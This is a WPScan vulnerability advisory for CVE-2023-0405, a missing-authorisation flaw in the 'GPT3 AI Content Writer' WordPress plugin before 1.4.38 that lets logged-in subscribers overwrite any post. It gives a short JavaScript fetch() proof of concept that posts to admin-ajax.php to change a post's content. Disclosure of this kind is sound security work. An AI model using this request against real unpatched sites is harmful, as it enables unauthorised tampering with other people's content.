WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

GPT3 AI Content Writer < 1.4.38 - Subscriber+ Arbitrary Post Content Update

Description

The plugin does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.

Proof of Concept

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wpaicg_set_post_content_&post_id=1&content=CHANGED',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

gpt3-ai-content-generator
Fixed in version 1.4.38

References

CVE
CVE-2023-0405

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
3ca9ac21-2bce-4480-9079-b4045b261273

Timeline

Publicly Published

2023-01-19 (about 4 months ago)

Added

2023-01-19 (about 4 months ago)

Last Updated

2023-01-19 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin